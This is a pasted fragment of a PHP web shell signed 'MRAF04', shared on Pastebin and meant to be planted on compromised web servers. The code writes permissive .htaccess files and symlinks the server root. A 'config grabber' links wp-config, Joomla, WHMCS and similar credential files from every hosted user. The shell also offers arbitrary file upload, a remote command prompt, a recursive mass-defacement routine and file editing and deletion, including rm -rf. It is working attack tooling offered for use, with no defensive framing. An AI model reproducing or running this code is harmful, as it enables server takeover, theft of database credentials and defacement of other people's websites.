  790. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  791. $g = fopen('lol/.htaccess','w');
  792. fwrite($g,$rr);
  793. $indishell = symlink("/","lol/root");
  794. $rt="<a href=lol/root target='_blank'><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
  795. echo "Please check link given below for / folder symlink <br><u>$rt</u>";
  796.  
  797. $dir=mkdir('CBM',0777);
  798. $r = " Options all \n DirectoryIndex jmbut.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  799. $f = fopen('INJECTION/.htaccess','w');
  800.  
  801. fwrite($f,$r);
  802. $consym="<a href=CBM/ target='_blank'><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  803. echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=white size=2 face=\"comic sans ms\">$consym<br><br></font></u>";
  804.  
  805. $usr=explode("\n",$_POST['user']);
  806. $configuration=array("wp-config.php",
  807. "wordpress/wp-config.php",
  808. "web/wp-config.php",
  809. "wp/wp-config.php",
  810. "press/wp-config.php",
  811. "wordpress/beta/wp-config.php",
  812. "news/wp-config.php",
  813. "new/wp-config.php",
  814. "blogs/wp-config.php",
  815. "home/wp-config.php",
  816. "blog/wp-config.php",
  817. "protal/wp-config.php",
  818. "site/wp-config.php",
  819. "main/wp-config.php",
  820. "test/wp-config.php",
  821. "wp/beta/wp-config.php",
  822. "beta/wp-config.php",
  823. "joomla/configuration.php",
  824. "protal/configuration.php",
  825. "joo/configuration.php",
  826. "cms/configuration.php",
  827. "site/configuration.php",
  828. "main/configuration.php",
  829. "news/configuration.php",
  830. "new/configuration.php",
  831. "home/configuration.php",
  832. "configuration.php",
  833. "SSI.php",
  834. "forum/SSI.php",
  835. "forum/inc/config.php",
  836. "forum/includes/config.php",
  837. "upload/includes/config.php",
  838. "cc/includes/config.php",
  839. "vb/includes/config.php",
  840. "vb3/includes/config.php",
  841. "cpanel/configuration.php",
  842. "panel/configuration.php",
  843. "ubmitticket.php",
  844. "manage/configuration.php",
  845. "myshop/configuration.php",
  846. "beta/configuration.php",
  847. "includes/config.php",
  848. "lib/config.php",
  849. "conf_global.php",
  850. "inc/config.php",
  851. "incl/config.php",
  852. "include/db.php",
  853. "include/config.php",
  854. "includes/functions.php",
  855. "includes/dist-configure.php",
  856. "connect.php",
  857. "mk_conf.php",
  858. "config/koneksi.php",
  859. "system/sistem.php",
  860. "config.php",
  861. "Settings.php",
  862. "settings.php",
  863. "sites/default/settings.php",
  864. "smf/Settings.php",
  865. "forum/Settings.php",
  866. "forums/Settings.php",
  867. "host/configuration.php",
  868. "hosting/configuration.php",
  869. "hosts/configuration.php",
  870. "zencart/includes/dist-configure.php",
  871. "shop/includes/dist-configure.php",
  872. "whm/configuration.php",
  873. "whmc/configuration.php",
  874. "whmcs/configuration.php",
  875. "whmc/WHM/configuration.php",
  876. "whm/WHMCS/configuration.php",
  877. "whm/whmcs/configuration.php",
  878. "order/configuration.php",
  879. "support/configuration.php",
  880. "supports/configuration.php",
  881. "oscommerce/includes/configure.php",
  882. "oscommerces/includes/configure.php",
  883. "shopping/includes/configure.php",
  884. "sale/includes/configure.php",
  885. "config.inc.php",
  886. "amember/config.inc.php",
  887. "clients/configuration.php",
  888. "client/configuration.php",
  889. "clientes/configuration.php",
  890. "cliente/configuration.php",
  891. "clientsupport/configuration.php",
  892. "billing/configuration.php",
  893. "billings/configuration.php",
  894. "admin/conf.php",
  895. "admin/config.php");
  896. foreach($usr as $uss )
  897. {
  898. $us=trim($uss);
  899.  
  900. foreach($configuration as $c)
  901. {
  902. $rs="/home/".$us."/public_html/".$c;
  903. $r="CBM/".$us." .. ".$c;
  904. symlink($rs,$r);
  905.  
  906. }
  907.  
  908. }
  909.  
  910.  
  911. }
  912.  
  913. }
  914. elseif($_GET['do'] == 'tconf') {
  915. echo "<center>";
  916. echo "<ul>";
  917. echo "<li> <a href='?dir=$dir&do=entod'>Config Grabber</a> </li>";
  918. echo "</ul>";
  919. echo "</center>";
  920. }
  921. elseif($_GET['do'] == 'upload') {
  922. echo "<center>";
  923. if($_POST['upload']) {
  924. if($_POST['tipe_upload'] == 'biasa') {
  925. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  926. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  927. } else {
  928. $act = "<font color=red>failed to upload file</font>";
  929. }
  930. } else {
  931. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  932. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  933. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  934. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  935. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  936. } else {
  937. $act = "<font color=red>failed to upload file</font>";
  938. }
  939. } else {
  940. $act = "<font color=red>failed to upload file</font>";
  941. }
  942. }
  943. }
  944. echo "Upload File:
  945. <form method='post' enctype='multipart/form-data'>
  946. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  947. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  948. <input type='file' name='ix_file'>
  949. <input type='submit' value='upload' name='upload'>
  950. </form>";
  951. echo $act;
  952. echo "</center>";
  953. }
  954. elseif($_GET['do'] == 'cmd') {
  955. echo "<form method='post'>
  956. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  957. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  958. </form>";
  959. if($_POST['do_cmd']) {
  960. echo "<pre>".exe($_POST['cmd'])."</pre>";
  961. }
  962. }
  963. elseif($_GET['do'] == 'mass_deface') {
  964. function sabun_massal($dir,$namafile,$isi_script) {
  965. if(is_writable($dir)) {
  966. $dira = scandir($dir);
  967. foreach($dira as $dirb) {
  968. $dirc = "$dir/$dirb";
  969. $lokasi = $dirc.'/'.$namafile;
  970. if($dirb === '.') {
  971. file_put_contents($lokasi, $isi_script);
  972. } elseif($dirb === '..') {
  973. file_put_contents($lokasi, $isi_script);
  974. } else {
  975. if(is_dir($dirc)) {
  976. if(is_writable($dirc)) {
  977. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  978. file_put_contents($lokasi, $isi_script);
  979. $idx = sabun_massal($dirc,$namafile,$isi_script);
  980. }
  981. }
  982. }
  983. }
  984. }
  985. }
  986. function sabun_biasa($dir,$namafile,$isi_script) {
  987. if(is_writable($dir)) {
  988. $dira = scandir($dir);
  989. foreach($dira as $dirb) {
  990. $dirc = "$dir/$dirb";
  991. $lokasi = $dirc.'/'.$namafile;
  992. if($dirb === '.') {
  993. file_put_contents($lokasi, $isi_script);
  994. } elseif($dirb === '..') {
  995. file_put_contents($lokasi, $isi_script);
  996. } else {
  997. if(is_dir($dirc)) {
  998. if(is_writable($dirc)) {
  999. echo "<center><font color=red>DONE</font> -><font color=red>$dirb/$namafile</font></center>";
  1000. file_put_contents($lokasi, $isi_script);
  1001. }
  1002. }
  1003. }
  1004. }
  1005. }
  1006. }
  1007. function sabun_domen($dir,$namafile,$isi_script) {
  1008. if(is_writable($dir)) {
  1009. $dira = scandir($dir);
  1010. foreach($dira as $dirb) {
  1011. $dirc = "$dir/$dirb";
  1012. $lokasi = $dirc.'/'.$namafile;
  1013. if($dirb === '.') {
  1014. file_put_contents($lokasi, $isi_script);
  1015. } elseif($dirb === '..') {
  1016. file_put_contents($lokasi, $isi_script);
  1017. } else {
  1018. if(is_dir($dirc)) {
  1019. if(is_writable($dirc)) {
  1020. echo "<center><a href='http://$dirb/$namafile' target='_blank'><font color=red>http://$dirb/$namafile</font></a></center>";
  1021. file_put_contents($lokasi, $isi_script);
  1022. }
  1023. }
  1024. }
  1025. }
  1026. }
  1027. }
  1028. if($_POST['start']) {
  1029. if($_POST['tipe_sabun'] == 'mahal') {
  1030. echo "<div style='margin: 5px auto; padding: 5px'>";
  1031. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1032. echo "</div>";
  1033. } elseif($_POST['tipe_sabun'] == 'murah') {
  1034. echo "<div style='margin: 5px auto; padding: 5px'>";
  1035. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1036. echo "</div>";
  1037. }elseif($_POST['tipe_sabun'] == 'diskon') {
  1038. echo "<div style='margin: 5px auto; padding: 5px'>";
  1039. sabun_domen($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1040. echo "</div>";
  1041. }
  1042. } else {
  1043. echo "<center>";
  1044. echo "<form method='post'>
  1045. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  1046. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<input type='radio' name='tipe_sabun' value='diskon'>domain<br>
  1047. <font style='text-decoration: underline;'>Folder:</font><br>
  1048. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1049. <font style='text-decoration: underline;'>Filename:</font><br>
  1050. <input type='text' name='d_file' value='x04.php' style='width: 450px;' height='10'><br>
  1051. <font style='text-decoration: underline;'>Index File:</font><br>
  1052. <textarea name='script' style='width: 450px; height: 200px;'>Visited By MRAF04</textarea><br>
  1053. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1054. </form></center>";
  1055. }
  1056. }
  1057. elseif($_GET['act'] == 'newfile') {
  1058. if($_POST['new_save_file']) {
  1059. $newfile = htmlspecialchars($_POST['newfile']);
  1060. $fopen = fopen($newfile, "a+");
  1061. if($fopen) {
  1062. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1063. } else {
  1064. $act = "<font color=red>permission denied</font>";
  1065. }
  1066. }
  1067. echo $act;
  1068. echo "<form method='post'>
  1069. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1070. <input type='submit' name='new_save_file' value='Submit'>
  1071. </form>";
  1072. } elseif($_GET['act'] == 'newfolder') {
  1073. if($_POST['new_save_folder']) {
  1074. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1075. if(!mkdir($new_folder)) {
  1076. $act = "<font color=red>permission denied</font>";
  1077. } else {
  1078. $act = "<script>window.location='?dir=".$dir."';</script>";
  1079. }
  1080. }
  1081. echo $act;
  1082. echo "<form method='post'>
  1083. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1084. <input type='submit' name='new_save_folder' value='Submit'>
  1085. </form>";
  1086. } elseif($_GET['act'] == 'rename_dir') {
  1087. if($_POST['dir_rename']) {
  1088. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1089. if($dir_rename) {
  1090. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1091. } else {
  1092. $act = "<font color=red>permission denied</font>";
  1093. }
  1094. echo "".$act."<br>";
  1095. }
  1096. echo "<form method='post'>
  1097. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1098. <input type='submit' name='dir_rename' value='rename'>
  1099. </form>";
  1100. } elseif($_GET['act'] == 'delete_dir') {
  1101. if(is_dir($dir)) {
  1102. if(is_writable($dir)) {
  1103. @rmdir($dir);
  1104. @exe("rm -rf $dir");
  1105. @exe("rmdir /s /q $dir");
  1106. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1107. } else {
  1108. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1109. }
  1110. }
  1111. echo $act;
  1112. } elseif($_GET['act'] == 'view') {
  1113. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> <br>";
  1114. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1115. } elseif($_GET['act'] == 'edit') {
  1116. if($_POST['save']) {
  1117. $save = file_put_contents($_GET['file'], $_POST['src']);
  1118. if($save) {
  1119. $act = "<font color=lime>Saved!</font>";
  1120. } else {
  1121. $act = "<font color=red>permission denied</font>";
  1122. }
  1123. echo "".$act."<br>";
  1124. }
  1125. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> <br>";
  1126. echo "<form method='post'>
  1127. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1128. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1129. </form>";
  1130. } elseif($_GET['act'] == 'rename') {
  1131. if($_POST['do_rename']) {
  1132. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1133. if($rename) {
  1134. $act = "<script>window.location='?dir=".$dir."';</script>";
  1135. } else {
  1136. $act = "<font color=red>permission denied</font>";
  1137. }
  1138. echo "".$act."<br>";
  1139. }
  1140. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> <br>";
  1141. echo "<form method='post'>
  1142. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1143. <input type='submit' name='do_rename' value='rename'>
  1144. </form>";
  1145. } elseif($_GET['act'] == 'delete') {
  1146. $delete = unlink($_GET['file']);
  1147. if($delete) {
  1148. $act = "<script>window.location='?dir=".$dir."';</script>";
  1149. } else {
  1150. $act = "<font color=red>permission denied</font>";
  1151. }
  1152. echo $act;
  1153. } else {
  1154. if(is_dir($dir) === true) {
  1155. if(!is_readable($dir)) {
  1156. echo "<font color=red>can't open directory. ( not readable )</font>";
  1157. } else {
  1158. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1159. <tr>
  1160. <th class="th_home"><center>Name</center></th>
  1161. <th class="th_home"><center>Type</center></th>
  1162. <th class="th_home"><center>Size</center></th>
  1163. <th class="th_home"><center>Last Modified</center></th>
  1164. <th class="th_home"><center>Owner/Group</center></th>
  1165. <th class="th_home"><center>Permission</center></th>
  1166. <th class="th_home"><center>Action</center></th>
  1167. </tr>';
  1168. $scandir = scandir($dir);
  1169. foreach($scandir as $dirx) {
  1170. $dtype = filetype("$dir/$dirx");
  1171. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1172. if(function_exists('posix_getpwuid')) {
  1173. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1174. $downer = $downer['name'];
  1175. } else {
  1176. //$downer = $uid;
  1177. $downer = fileowner("$dir/$dirx");
  1178. }
  1179. if(function_exists('posix_getgrgid')) {
  1180. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1181. $dgrp = $dgrp['name'];
  1182. } else {
  1183. $dgrp = filegroup("$dir/$dirx");
  1184. }
  1185. if(!is_dir("$dir/$dirx")) continue;
  1186. if($dirx === '..') {
  1187. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1188. } elseif($dirx === '.') {
  1189. $href = "<a href='?dir=$dir'>$dirx</a>";
  1190. } else {
  1191. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1192. }
  1193. if($dirx === '.' || $dirx === '..') {
  1194. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1195. } else {
  1196. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1197. }
  1198. echo "<tr>";
  1199. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1200. echo "<td class='td_home'><center>$dtype</center></td>";
  1201. echo "<td class='td_home'><center>-</center></th></td>";
  1202. echo "<td class='td_home'><center>$dtime</center></td>";
  1203. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1204. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1205. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1206. echo "</tr>";
  1207. }
  1208. }
  1209. } else {
  1210. echo "<font color=red>can't open directory.</font>";
  1211. }
  1212. foreach($scandir as $file) {
  1213. $ftype = filetype("$dir/$file");
  1214. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1215. $size = filesize("$dir/$file")/1024;
  1216. $size = round($size,3);
  1217. if(function_exists('posix_getpwuid')) {
  1218. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1219. $fowner = $fowner['name'];
  1220. } else {
  1221. //$downer = $uid;
  1222. $fowner = fileowner("$dir/$file");
  1223. }
  1224. if(function_exists('posix_getgrgid')) {
  1225. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1226. $fgrp = $fgrp['name'];
  1227. } else {
  1228. $fgrp = filegroup("$dir/$file");
  1229. }
  1230. if($size > 1024) {
  1231. $size = round($size/1024,2). 'MB';
  1232. } else {
  1233. $size = $size. 'KB';
  1234. }
  1235. if(!is_file("$dir/$file")) continue;
  1236. echo "<tr>";
  1237. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1238. echo "<td class='td_home'><center>$ftype</center></td>";
  1239. echo "<td class='td_home'><center>$size</center></td>";
  1240. echo "<td class='td_home'><center>$ftime</center></td>";
  1241. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1242. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1243. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1244.  
  1245. echo "</tr>";
  1246. }
  1247. echo "</table>";
  1248. if(!is_readable($dir)) {
  1249. //
  1250. } else {
  1251. echo"<br>";
  1252. }
  1253. }
  1254. ?>
  1255. </center></span><footer id="ftr" style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:right;">
  1256. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!